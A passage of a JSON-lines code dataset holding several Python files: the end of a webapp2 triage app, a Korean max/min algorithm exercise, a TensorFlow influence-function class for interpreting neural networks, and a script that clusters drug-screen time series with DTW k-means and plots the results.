self.redirect(\"/create\")\n\n\nclass Scan(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('scan.html')\n self.response.write(template.render())\n\nclass Data(webapp2.RequestHandler):\n def get(self):\n i=0;\n w, h = 2, 10;\n a = [[0 for x in range(w)] for y in range(h)] \n data = dataCapture()\n data.reverse()\n for response in data:\n time=datetime.datetime.fromtimestamp(int(response[0])).strftime('%Y-%m-%d %H:%M:%S')\n datastring = str(response[1])\n a[i][0] = time\n a[i][1]=datastring\n i = i + 1\n template_vars = {\n 'time': time,\n 'datastring': datastring,\n 'a': a,\n }\n template = JINJA_ENVIRONMENT.get_template('data.html')\n self.response.out.write(template.render(template_vars))\n\n\napp = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/listall', ListAll),\n ('/create', 
Create),\n ('/triage', Triage),\n ('/faq', Faq),\n ('/scan', Scan),\n ('/data', Data)\n], debug=True)\n","repo_name":"sandeepdarknights/EG4301","sub_path":"Smartriage/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31557024286","text":"from typing import List\n\n\ndef optimal_find_max_and_min(nums: List[int], n: int) -> List[int]:\n\t# 1개이면 이게 가장 큰 수인 동시에 작은 수이다.\n\tif n == 1:\n\t\treturn [nums[0], nums[0]]\n\tis_odd = True if n % 2 == 1 else False\n\tif is_odd:\n\t\tmax_num = min_num = nums[0]\n\telse:\n\t\tmax_num, min_num = (nums[0], nums[1]) if nums[0] > nums[1] else (nums[1], nums[0])\n\t# 홀수이면 1부터, 짝수이면 2부터\n\tstart = 1 if is_odd else 2\n\tfor i in range(start, n - 1, 2):\n\t\tif nums[i] < nums[i + 1]:\n\t\t\tif nums[i] < min_num:\n\t\t\t\tmin_num = nums[i]\n\t\t\tif nums[i+1] > max_num:\n\t\t\t\tmax_num = nums[i+1]\n\t\telse:\n\t\t\tif nums[i+1] < min_num:\n\t\t\t\tmin_num = nums[i+1]\n\t\t\tif nums[i] > max_num:\n\t\t\t\tmax_num = nums[i]\n\n\treturn [max_num, min_num]\n\nT = int(input())\nfor _ in range(T):\n\tn = int(input())\n\tnums = list(map(int, input().split()))\n\tprint(' '.join(map(str, optimal_find_max_and_min(nums, n))))\n","repo_name":"hyunjune-lee/python_algorithm_interview","sub_path":"Temp Storage/2021_Algorithm/06_선택/최댓값과 최솟값을 동시에.py","file_name":"최댓값과 최솟값을 동시에.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23271356235","text":"\"\"\"\nCreated on August 4, 2019\n\n@author: Mark Rothermel\n\"\"\"\n\nfrom src.genericNeuralNet import GenericNeuralNet # base model class for influence computation\n\nimport time # for timing SPN learning duration\nimport os\nimport numpy as np\nimport tensorflow as tf\n\n\nclass InterpretableNn(GenericNeuralNet):\n \"\"\"\n Neural network (NN) for multi-class classification, interpretable with influence functions.\n \"\"\"\n\n def __init__(self, output_node, sample_placeholder, label_placeholder, loss_op, **kwargs):\n self.output_node = output_node\n self.sample_placeholder = sample_placeholder\n self.label_placeholder = label_placeholder\n self.loss_op = loss_op\n\n super().__init__(batch_size=1,\n mini_batch=False,\n **kwargs)\n\n def placeholder_inputs(self):\n \"\"\"Returns the TensorFlow placeholders for sample and label input.\"\"\"\n sample_ph = self.sample_placeholder\n label_ph = self.label_placeholder\n return sample_ph, label_ph\n\n def get_all_params(self):\n \"\"\"Returns all trainable parameters of the model as a list of tf.Tensors.\"\"\"\n all_params = tf.trainable_variables()\n\n print(\"all_params:\", all_params)\n\n return all_params\n\n def loss(self):\n \"\"\"Generates the TF computation graph for the loss and returns the loss operator.\"\"\"\n prediction = self.output_node\n true_label = self.label_placeholder\n\n loss = tf.subtract(prediction, true_label, name=\"Total_Loss\")\n\n return self.loss_op\n\n # Influence function 2 (taken from influence function repository)\n def get_influence_on_test_loss(self, test_indices,\n train_idx,\n approx_type='cg',\n approx_params=None,\n force_refresh=True,\n test_description=None,\n loss_type='normal_loss',\n ignore_training_error=False,\n ignore_hessian=False,\n output_file=None):\n \"\"\"Influence function I_{up,loss} with option to ignore Hessian\"\"\"\n\n test_grad_loss_no_reg_val = self.get_test_grad_loss_no_reg_val(test_indices, 
loss_type=loss_type)\n\n norm = np.linalg.norm(np.concatenate([np.asarray(est).flatten() for est in test_grad_loss_no_reg_val]))\n print('Norm of test gradient: %s' % norm)\n\n start_time = time.time()\n\n if test_description is None:\n test_description = test_indices\n\n approx_filename = os.path.join(self.train_dir, '%s-%s-%s-test-%s.npz' % (\n self.model_name, approx_type, loss_type, test_description))\n if not ignore_hessian:\n if os.path.exists(approx_filename) and force_refresh == False:\n inverse_hvp = list(np.load(approx_filename, allow_pickle=True)['inverse_hvp'])\n print('Loaded inverse HVP from %s' % approx_filename)\n else:\n inverse_hvp = self.get_inverse_hvp(\n test_grad_loss_no_reg_val,\n approx_type,\n approx_params,\n output_file=output_file)\n np.savez(approx_filename, inverse_hvp=inverse_hvp)\n print('Saved inverse HVP to %s' % approx_filename)\n else:\n inverse_hvp = test_grad_loss_no_reg_val\n\n duration = time.time() - start_time\n print('Inverse HVP took %s sec' % duration)\n\n start_time = time.time()\n\n num_to_remove = len(train_idx)\n predicted_loss_diffs = np.zeros([num_to_remove])\n for counter, idx_to_remove in enumerate(train_idx):\n\n if not ignore_training_error:\n single_train_feed_dict = self.fill_feed_dict_with_one_ex(self.data_sets.train, idx_to_remove)\n train_grad_loss_val = self.sess.run(self.grad_total_loss_op, feed_dict=single_train_feed_dict)\n else:\n train_grad_loss_val = [np.ones(np.sum([np.prod(np.shape(param)) for param in self.params]))]\n train_grad_loss_val = [np.asarray(est).flatten() for est in train_grad_loss_val] # added\n inverse_hvp = [np.asarray(est).flatten() for est in inverse_hvp] # added\n predicted_loss_diffs[counter] = np.dot(np.concatenate(inverse_hvp),\n np.concatenate(train_grad_loss_val)) / self.num_train_examples\n\n duration = time.time() - start_time\n print('Multiplying by %s train examples took %s sec' % (num_to_remove, duration))\n\n return predicted_loss_diffs\n\n # Influence function 3 (taken from influence function repository and modified)\n def get_grad_of_influence_wrt_input(self, train_indices,\n test_indices,\n approx_type='cg',\n approx_params=None,\n force_refresh=True,\n verbose=True,\n test_description=None,\n loss_type='normal_loss',\n ignore_hessian=False,\n output_file=None):\n \"\"\"Influence function I_{pert,loss} with option to ignore Hessian\"\"\"\n\n # Calculate v_placeholder (gradient of loss at test point)\n test_grad_loss_no_reg_val = self.get_test_grad_loss_no_reg_val(test_indices, loss_type=loss_type)\n\n norm = np.linalg.norm(np.concatenate([np.asarray(est).flatten() for est in test_grad_loss_no_reg_val]))\n if verbose: print('Norm of test gradient: %s' % norm)\n\n start_time = time.time()\n\n if test_description is None:\n test_description = test_indices\n\n approx_filename = os.path.join(self.train_dir, '%s-%s-%s-test-%s.npz' % (\n self.model_name, approx_type, loss_type, test_description))\n\n if not ignore_hessian:\n if os.path.exists(approx_filename) and force_refresh == False:\n inverse_hvp = list(np.load(approx_filename, allow_pickle=True)['inverse_hvp'])\n if verbose: print('Loaded inverse HVP from %s' % approx_filename)\n else:\n inverse_hvp = self.get_inverse_hvp(\n test_grad_loss_no_reg_val,\n approx_type,\n approx_params,\n verbose=verbose,\n output_file=output_file)\n np.savez(approx_filename, inverse_hvp=inverse_hvp)\n if verbose: print('Saved inverse HVP to %s' % approx_filename)\n else:\n inverse_hvp = test_grad_loss_no_reg_val\n\n duration = time.time() - start_time\n if 
verbose: print('Inverse HVP took %s sec' % duration)\n\n grad_influence_wrt_input_val = None\n\n for counter, train_idx in enumerate(train_indices):\n # Put in the train example in the feed dict\n grad_influence_feed_dict = self.fill_feed_dict_with_one_ex(\n self.data_sets.train,\n train_idx)\n\n self.update_feed_dict_with_v_placeholder(grad_influence_feed_dict, inverse_hvp)\n\n # Run the grad op with the feed dict\n current_grad_influence_wrt_input_val = \\\n self.sess.run(self.grad_influence_wrt_input_op, feed_dict=grad_influence_feed_dict)[0][0, :]\n\n if grad_influence_wrt_input_val is None:\n grad_influence_wrt_input_val = np.zeros(\n [len(train_indices), len(current_grad_influence_wrt_input_val)])\n\n grad_influence_wrt_input_val[counter, :] = current_grad_influence_wrt_input_val\n\n return grad_influence_wrt_input_val\n\n def get_grad_loss_wrt_input(self, test_indices):\n \"\"\"Gets a list of test sample indices and returns a list\n of loss gradients regarding the inputs of each of the test samples.\"\"\"\n grads = []\n op = self.grad_loss_wrt_input_op\n\n # For each test sample get the loss gradient\n for i in test_indices:\n test_sample = self.data_sets.test.x[i]\n test_label = self.data_sets.test.labels[i]\n feed_dict = {\"Sample_Placeholder:0\": [test_sample],\n \"Label_Placeholder:0\": [test_label]}\n gradient = self.sess.run(op, feed_dict=feed_dict)\n grads = np.append(grads, gradient)\n\n d = self.grad_loss_wrt_input_op[0].shape[1].value\n return np.reshape(grads, (-1, d))\n","repo_name":"MaggiR/Interpreting-SPNs","sub_path":"src/InterpretableNn.py","file_name":"InterpretableNn.py","file_ext":"py","file_size_in_byte":8712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"11499130824","text":"import os, random, json\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom PIL import Image\nfrom tslearn.clustering import TimeSeriesKMeans\nfrom scipy.signal import savgol_filter\nfrom sklearn import metrics\nfrom random import sample\nfrom math import ceil\n\nseed = 10\nrandom.seed(seed)\n\ndef run_clustering_methods(data,\n n_clusters,\n path_fig,\n path_out,\n hist_plot,\n cluster_plot,\n ):\n \"run clustering method on temporal distance files, and output cluster labels and a few diagnostic plots\"\n\n model = TimeSeriesKMeans(n_clusters= n_clusters,\n metric=\"dtw\",\n random_state=seed)\n\n model.fit(data)\n\n os.chdir(path_fig)\n\n ax = sns.histplot(data= model.labels_,\n kde=True,\n discrete = True\n )\n\n ax.set(xlabel='DTW K-means clusters={}'.format(str(n_clusters)))\n\n plt.savefig(\"hist-\" + hist_plot + 'cluster_n-' + str(n_clusters) + \".svg\",\n transparent = True, dpi = 1200)\n\n plt.close(\"all\")\n\n plt.figure()\n sz = data.shape[1]\n for cluster_id in range(0, max(model.labels_ + 1)):\n\n idx = model.labels_ == cluster_id\n\n data_clustered = data[np.array(idx),]\n\n plt.subplot(3, 3, cluster_id + 1)\n for xx in data_clustered:\n plt.plot(xx.ravel(), \"k-\", alpha=.2)\n\n plt.plot(savgol_filter(model.cluster_centers_[cluster_id].ravel(), 7, 2), \"r-\", linewidth = 2.5)\n plt.xlim(0, sz)\n plt.ylim(0, 1.2)\n plt.text(0.55, 0.85, 'Cluster %d' % (cluster_id),\n transform=plt.gca().transAxes)\n\n plt.tight_layout()\n\n plt.savefig('nclus' + str(n_clusters) + cluster_plot + '.svg')\n\n plt.close(\"all\")\n\n os.chdir(path_out)\n\n np.save('labels_nclus_' + str(n_clusters), model.labels_)\n\n\n\n return(model.labels_)\n\ndef cluster_eval_metrics(X,\n 
labels,\n metric = 'euclidean'):\n 'run evaluation metrics for different number of clusters'\n\n ss_metric = metrics.silhouette_score(X, labels, metric)\n\n ch_metric = metrics.calinski_harabasz_score(X, labels)\n\n db_metric = metrics.davies_bouldin_score(X, labels)\n\n return([ss_metric, ch_metric, db_metric])\n\ndef plot_eval_metrics(list_nclus,\n summary_eval_metrics,\n path_fig):\n # Create a subplot with 1 rows and 3 columns for visualize cluster evaluation metrics\n\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3)\n fig.set_size_inches(21, 7)\n\n ax1.plot(list_nclus, summary_eval_metrics[:, 0])\n\n ax1.set_title(\"The silhouette score for the various clusters.\")\n ax1.set_ylabel(\"Silhouette score\")\n ax1.set_xlabel(\"Cluster label\")\n\n ax2.plot(list_nclus, summary_eval_metrics[:, 1])\n\n ax2.set_title(\"The Calinski-Harabasz score for the various clusters.\")\n ax2.set_ylabel(\"Calinski-Harabasz score\")\n ax2.set_xlabel(\"Cluster label\")\n\n ax3.plot(list_nclus, summary_eval_metrics[:, 2])\n\n ax3.set_title(\"The Davies-Bouldin score for the various clusters.\")\n ax3.set_ylabel(\"Davies-Bouldin score\")\n ax3.set_xlabel(\"Cluster label\")\n\n os.chdir(path_fig)\n\n plt.savefig('cluster_eval_metrics.svg')\n\n plt.close(\"all\")\n\ndef drug_centric_analysis(metadata,\n cluster_labels,\n path_fig,\n heatmap_label\n ):\n \"run drug-centric analysis, to observe possible differences in drug effect from clustering analysis\"\n\n n_clusters = max(cluster_labels)\n\n drug_set = set(metadata['drug'])\n\n drugs = metadata['drug']\n\n clusters_by_drug = np.empty(shape=(0, n_clusters + 1))\n\n for drug in drug_set:\n if drug != \"PBS\":\n # drug = drug_set[1]\n idx = [x == drug for x in drugs]\n\n idx = np.array(idx, dtype='bool')\n\n drug_labels = np.array(cluster_labels)[idx]\n\n cluster_freq = []\n\n for cluster in range(0, n_clusters + 1):\n\n cluster_freq.append(sum(drug_labels == cluster) / len(drug_labels))\n\n cluster_freq = np.array(cluster_freq).reshape(1, n_clusters + 1)\n\n clusters_by_drug = np.append(clusters_by_drug, cluster_freq, axis=0)\n else:\n pass\n\n drug_names = [x for x in drug_set if x != \"PBS\"]\n\n heat = sns.heatmap(data = clusters_by_drug,\n linewidth=0.5,\n yticklabels=drug_names,\n cmap=\"YlOrBr\")\n\n plt.tight_layout()\n\n os.chdir(path_fig)\n\n plt.savefig('nclus_'+str(n_clusters+1)+heatmap_label+\".svg\", dpi=1200)\n\n plt.close(\"all\")\n\ndef cell_freq_by_cluster(metadata,\n cluster_labels,\n path_fig,\n heatmap_label\n ):\n \"run drug-centric analysis, to observe possible differences in drug effect from clustering analysis\"\n\n n_clusters = max(cluster_labels)\n\n cell_set = set(metadata['cell'])\n\n cells = metadata['cell']\n\n clusters_by_cell = np.empty(shape=(0, n_clusters + 1))\n\n for cell in cell_set:\n\n idx = [x == cell for x in cells]\n\n idx = np.array(idx, dtype='bool')\n\n cell_labels = np.array(cluster_labels)[idx]\n\n cluster_freq = []\n\n for cluster in range(0, n_clusters + 1):\n\n cluster_freq.append(sum(cell_labels == cluster) / len(cell_labels))\n\n cluster_freq = np.array(cluster_freq).reshape(1, n_clusters + 1)\n\n clusters_by_cell = np.append(clusters_by_cell, cluster_freq, axis=0)\n\n cell_names = [x for x in cell_set]\n\n heat = sns.heatmap(data = clusters_by_cell,\n linewidth=0.5,\n yticklabels=cell_names,\n cmap=\"YlOrBr\")\n\n plt.tight_layout()\n\n os.chdir(path_fig)\n\n plt.savefig('nclus_'+str(n_clusters+1)+heatmap_label+\".svg\", dpi=1200)\n\n plt.close(\"all\")\n\n\ndef cell_centric_analysis(metadata,\n cluster_labels,\n 
path_fig,\n heatmap_label):\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n for cell in set(cells):\n \"generate cell-centric results for multiple drugs and their concentrations\"\n #cell = 'SKMEL2'\n\n idx = [x == cell for x in cells]\n idx = np.array(idx, dtype='bool')\n\n drug_sub = np.array(drugs)[idx]\n conc_sub = np.array(concs, dtype='float')[idx]\n label_sub = np.array(cluster_labels)[idx]\n\n drug_label = np.empty(shape=(0,5))\n\n drug_name = []\n\n for drug in set(drug_sub):\n if drug != 'PBS':\n #drug = drug_sub.item(0)\n idx_drug = [x == drug for x in drug_sub]\n idx_drug = np.array(idx_drug, dtype='bool')\n\n conc_drug = conc_sub[idx_drug]\n\n if len(conc_drug) == 5:\n\n label_drug = label_sub[idx_drug]\n\n conc_sort = conc_drug.argsort()\n\n label_drug = label_drug[conc_sort[::-1]]\n\n label_drug = label_drug.reshape(1, 5)\n\n drug_label = np.append(drug_label, label_drug, axis=0)\n\n drug_name.append(drug)\n\n else:\n pass\n else:\n pass\n\n new_path = path_fig+'\\\\'+'cell-analysis'\n\n if os.path.exists(new_path) == False:\n os.makedirs(new_path)\n else:\n pass\n\n os.chdir(new_path)\n\n #print(new_path)\n\n heat = sns.heatmap(drug_label,\n yticklabels = drug_name,\n annot=True\n )\n\n plt.savefig(cell+\"_\"+heatmap_label+\".svg\")\n\n #plt.show()\n plt.close(\"all\")\n\n del new_path\n\ndef max_conc_analysis(metadata,\n cluster_labels,\n path_fig,\n heatmap_label):\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n iter_cells = set(cells)\n iter_drugs = set(drugs)\n\n comb_array = np.empty(shape = (len(iter_cells), len(iter_drugs)))\n comb_array = pd.DataFrame(comb_array, columns=iter_drugs, index=iter_cells)\n\n\n for cell in iter_cells:\n \"generate cell-centric results for multiple drugs and their concentrations\"\n #cell = 'SKMEL2'\n\n idx = [x == cell for x in cells]\n idx = np.array(idx, dtype='bool')\n\n drug_sub = np.array(drugs)[idx]\n conc_sub = np.array(concs, dtype='float')[idx]\n label_sub = np.array(cluster_labels)[idx]\n\n for drug in iter_drugs:\n if drug != 'PBS':\n #drug = \"Methotrexate\"\n idx_drug = [x == drug for x in drug_sub]\n idx_drug = np.array(idx_drug, dtype='bool')\n\n conc_of_drug = conc_sub[idx_drug]\n label_of_drug = label_sub[idx_drug]\n\n max_conc = max(conc_of_drug)\n\n label_at_max_conc = label_of_drug[conc_of_drug == max_conc]\n\n comb_array[drug][cell] = label_at_max_conc\n\n comb_array = comb_array.drop(\"PBS\", axis = 1)\n\n os.chdir(path_fig)\n\n my_colors = ['xkcd:grey', 'xkcd:orange', 'xkcd:apple green','xkcd:red']\n\n drug_names = [x for x in iter_drugs if x != \"PBS\"]\n\n heat = sns.clustermap(comb_array,\n yticklabels=iter_cells,\n xticklabels=drug_names,\n cmap = my_colors,\n metric = 'correlation'\n )\n\n heat.cax.set_visible(False)\n\n plt.tight_layout()\n\n plt.savefig(heatmap_label+\".svg\", transparent = True, dpi = 1200)\n\ndef drug_conc_centric_analysis(metadata,\n cluster_labels,\n path_fig):\n\n \"run drug-centric analysis, to observe possible differences in drug effect from clustering analysis\"\n\n n_clusters = max(cluster_labels)\n\n drug_set = list(set(metadata['drug']))\n\n drugs = metadata['drug']\n concs = metadata['conc']\n\n clusters_by_drug = np.empty(shape=(0,n_clusters+1))\n\n\n os.chdir(path_fig)\n\n pie_size = 1\n\n ncol = 2\n nrow = ceil(len(drug_set) / ncol)\n\n\n fig, ax = plt.subplots(nrow, ncol, figsize=(10, 40))\n\n count = 0\n\n for i, ax_row in enumerate(ax):\n for j, axes in enumerate(ax_row):\n\n drug = 
drug_set[count]\n\n\n idx = [x == drug for x in drugs]\n idx = np.array(idx, dtype='bool')\n\n conc_sub = np.array(metadata['conc'])[idx]\n drug_labels = np.array(cluster_labels)[idx]\n\n cluster_freq = np.empty(shape=(n_clusters+1, 5))\n\n if drug != 'PBS':\n if len(set(conc_sub)) == 5:\n\n for cluster in range(0,n_clusters+1):\n\n #cluster = 0\n idx_cluster = [x == cluster for x in drug_labels]\n idx_cluster = np.array(idx_cluster, dtype='bool')\n\n conc_labels_sub = conc_sub[idx_cluster]\n count_conc = 0\n for conc in sorted(set(conc_sub), reverse=False):\n #conc = conc_sub[1]\n\n cluster_freq[cluster,count_conc] = sum(conc_labels_sub == conc) / sum(idx_cluster)\n\n count_conc += 1\n\n axes.set_title(str(drug).format(i, j))\n axes.set_yticklabels([])\n axes.set_xticklabels([])\n\n conc_iter = cluster_freq[:, 4].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=1,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 3].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.85,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 2].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.70,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 1].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.55,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 0].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.40,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n else:\n pass\n # axes.set_title(str(drug).format(i, j))\n # axes.set_yticklabels([])\n # axes.set_xticklabels([])\n #\n # plt.plot()\n\n else:\n pass\n # axes.set_title(str(drug).format(i, j))\n # axes.set_yticklabels([])\n # axes.set_xticklabels([])\n\n # plt.plot()\n\n\n count += 1\n\n plt.tight_layout()\n plt.savefig(\"drug-conc_pie-plots.svg\", transparent = True, dpi = 1200)\n plt.close(\"all\")\n\ndef conc_centric_analysis(metadata,\n cluster_labels,\n path_fig):\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n conc_summary_by_label = np.zeros(shape=(5, len(set(cluster_labels))))\n\n for drug in set(drugs):\n \"generate concentration-centric results\"\n #drug = drugs[100]\n\n idx = [x == drug for x in drugs]\n idx = np.array(idx, dtype='bool')\n\n conc_sub = np.array(concs, dtype='float')[idx]\n label_sub = np.array(cluster_labels)[idx]\n\n drug_label = np.empty(shape=(0,5))\n\n drug_name = []\n\n if drug != 'PBS':\n\n if len(set(conc_sub)) == 5:\n\n iter_conc = 0\n\n for conc in sorted(set(conc_sub), reverse=True):\n #conc = sorted(set(conc_sub), reverse=True)[3]\n\n idx_conc = [x == conc for x in conc_sub]\n idx_conc = np.array(idx_conc, dtype='bool')\n\n label_for_conc = label_sub[idx_conc]\n\n label_per_concentration = [0]*len(set(cluster_labels))\n\n for label in sorted(set(label_sub), reverse=False):\n label_per_concentration[label] = label_per_concentration[label] + sum(label_for_conc == label)\n\n conc_summary_by_label[iter_conc,:] = 
conc_summary_by_label[iter_conc,:] +label_per_concentration\n\n iter_conc = iter_conc + 1\n\n label_drug = label_sub[idx_conc]\n\n label_drug = label_drug.reshape(1, 5)\n\n drug_label = np.append(drug_label, label_drug, axis=0)\n\n drug_name.append(drug)\n else:\n pass\n else:\n pass\n\n new_path = path_fig+'\\\\'+ drug\n\n if os.path.exists(new_path) == False:\n os.makedirs(new_path)\n else:\n pass\n\n os.chdir(new_path)\n\n heat = sns.heatmap(drug_label,\n yticklabels = drug_name\n )\n\n plt.savefig(\"heatmap.svg\")\n\n #plt.show()\n plt.close(\"all\")\n\n del new_path\n\n\ndef biological_inference_of_clusters(chosen_cluster ,\n path_fig\n ):\n\n labels_eff = chosen_cluster\n\n noEffect = [0,4, 5, 7] #as 0\n mixedEffect = [2,6] #as 1\n cytostatic = [3] #as 2\n cytotoxic = [1] #as 3\n\n labels_eff = [\"No Effect\" if x in set(noEffect) else x for x in labels_eff]\n labels_eff = [\"Mixed Effect\" if x in set(mixedEffect) else x for x in labels_eff]\n labels_eff = [\"Cytostatic\" if x in set(cytostatic) else x for x in labels_eff]\n labels_eff = [\"Cytotoxic\" if x in set(cytotoxic) else x for x in labels_eff]\n\n labels_eff = [0 if x == \"No Effect\" else x for x in labels_eff]\n labels_eff = [1 if x == \"Mixed Effect\" else x for x in labels_eff]\n labels_eff = [2 if x == \"Cytostatic\" else x for x in labels_eff]\n labels_eff = [3 if x == \"Cytotoxic\" else x for x in labels_eff]\n\n drug_centric_analysis(metadata = metadata,\n cluster_labels = labels_eff,\n path_fig = path_fig,\n heatmap_label=\"_drug_effect2_cell-drug_scaled_denoise_eff\")\n return(labels_eff)\n\ndef get_drug_position(path_data_file):\n os.chdir(path_data_file)\n\n MSP1 = pd.read_excel('randomized_layout_1MSP_batch2.xls')\n MSP1['MSP_plate'] = \"P1\"\n MSP2 = pd.read_excel('randomized_layout_2MSP_batch2.xls')\n MSP2['MSP_plate'] = \"P2\"\n\n MSP_full = [MSP1, MSP2]\n\n MSP_full = pd.concat(MSP_full)\n\n return(MSP_full)\n\n\ndef get_raw_images(metadata,\n cluster_labels,\n output_path,\n n_images_per_cluster\n ):\n\n drug_map = get_drug_position('\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\clean_data')\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n cells_image_dir = []\n\n for n in range(1,8):\n batch = \"batch_{}/\".format(str(n))\n batch_in = \"\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users/Mauro/Cell_culture_data/190310_LargeScreen/imageData/\" + batch\n\n cell_in_batch_dir = [x.path for x in os.scandir(batch_in) if x.is_dir()]\n\n [cells_image_dir.append(x) for x in cell_in_batch_dir]\n\n for cluster in range(0,max(cluster_labels)+1):\n #cluster = 2\n #subset list of clusters from metadata\n\n output_path_cluster = output_path+\"/cluster_{}/\".format(str(cluster))\n\n if not os.path.exists(output_path_cluster):\n os.makedirs(output_path_cluster)\n else:\n pass\n\n idx = [x == cluster for x in labels]\n idx = np.array(idx, dtype='bool')\n\n drug_sub = np.array(drugs)[idx]\n cell_sub = np.array(cells)[idx]\n conc_sub = np.array(concs)[idx]\n\n #take 15 random samples from the clusters\n\n idx_random = sample(range(0,len(drug_sub)), n_images_per_cluster)\n\n drug_rand = np.array(drug_sub)[idx_random]\n cell_rand = np.array(cell_sub)[idx_random]\n conc_rand = np.array(conc_sub)[idx_random]\n\n for idx in range(0,len(drug_rand)):\n #idx = 1\n\n drug_to_map = drug_rand[idx]\n cell_to_map = cell_rand[idx]\n conc_to_map = conc_rand[idx]\n\n #convert concentration into well (available in drug 
map)\n\n d1 = np.array(drug_map[\"Drug\"] == drug_to_map, dtype='bool')\n d2 = np.array(drug_map[\"Final_conc_uM\"].round(5) == float(conc_to_map), dtype = 'bool')\n\n well_to_search = drug_map[d1 & d2 ]\n\n plate_to_search = well_to_search[\"MSP_plate\"].unique()\n\n batch_matched = re.compile(\".*({}).*\".format(cell_to_map))\n\n if len(plate_to_search) > 1:\n exit()\n else:\n pass\n\n\n cell_folder = [x for x in cells_image_dir if batch_matched.search(x)]\n\n if plate_to_search== \"P1\":\n match_pattern = \".*({}).*\".format(\"P1\")\n plate_to_match = re.compile(match_pattern)\n plate_to_match = [x for x in cell_folder if plate_to_match.search(x)]\n else:\n pass\n\n if plate_to_search == \"P2\":\n match_pattern = \".*({}).*\".format(\"P2\")\n plate_to_match = re.compile(match_pattern)\n plate_to_match = [x for x in cell_folder if plate_to_match.search(x)]\n else:\n pass\n\n os.chdir(plate_to_match[0])\n\n well_position_list = []\n\n for x in range(0,len(well_to_search)):\n #x = 0\n\n col = well_to_search['Column'].to_list()[x]\n row = well_to_search.iloc[x]['Row']\n well_position = row + str(col)\n\n well_position_list.append(well_position)\n\n well_position_list = [\"_{}_\".format(x) for x in well_position_list]\n\n images_to_move = []\n\n for x in os.listdir():\n\n if bool(re.search(\"|\".join(well_position_list), x)) == True:\n images_to_move.append(x)\n else:\n pass\n\n for image in images_to_move:\n\n os.chdir(plate_to_match[0])\n\n image_file = Image.open(image)\n\n os.chdir(output_path_cluster)\n\n image_file.save(image)\n\nif __name__ == \"__main__\":\n\n path_data_file = '\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\clean_data'\n path_fig = '\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\figures\\\\pheno-ml'\n path_out = '\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\clean_data\\\\cluster_pheno-ml'\n\n data_file = 'dist_combined_celldrug-scaled_denoise.npy'\n\n os.chdir(path_data_file)\n\n data = np.load(data_file)\n\n metadata_file = 'metadata-pheno-ml.json'\n\n summary_eval_metrics = np.empty(shape=(0, 3))\n\n list_nclus = []\n\n with open(metadata_file) as output_file:\n metadata = json.load(output_file)\n\n for idx in range(2,10):\n 'iterate for different number of clusters'\n #idx = 8\n\n list_nclus.append(idx)\n\n labels = run_clustering_methods(data = data,\n path_fig = path_fig,\n path_out = path_out,\n n_clusters = idx,\n hist_plot = \"clusters-celldrug-scaled_denoise\",\n cluster_plot = '_kmeans_cell-drugscaled_denoise_avg'\n )\n\n metric = cluster_eval_metrics(X = data,\n labels = labels,\n metric = 'euclidean')\n\n metric = np.array(metric).reshape(1,3)\n\n summary_eval_metrics = np.append(summary_eval_metrics, metric, axis = 0)\n\n drug_centric_analysis(metadata = metadata,\n cluster_labels = labels,\n path_fig = path_fig,\n heatmap_label=\"_drug_effect2_cell-drug_scaled_denoise\")\n\n cell_freq_by_cluster(metadata = metadata,\n cluster_labels = labels,\n path_fig = path_fig,\n heatmap_label = \"freq-by-cell\"\n )\n\n cell_centric_analysis(metadata=metadata,\n cluster_labels=labels,\n path_fig=path_fig,\n heatmap_label=\"-heatmap_cell-drug_scaled2\")\n\n #TODO fix conc_centric_analysis\n\n # 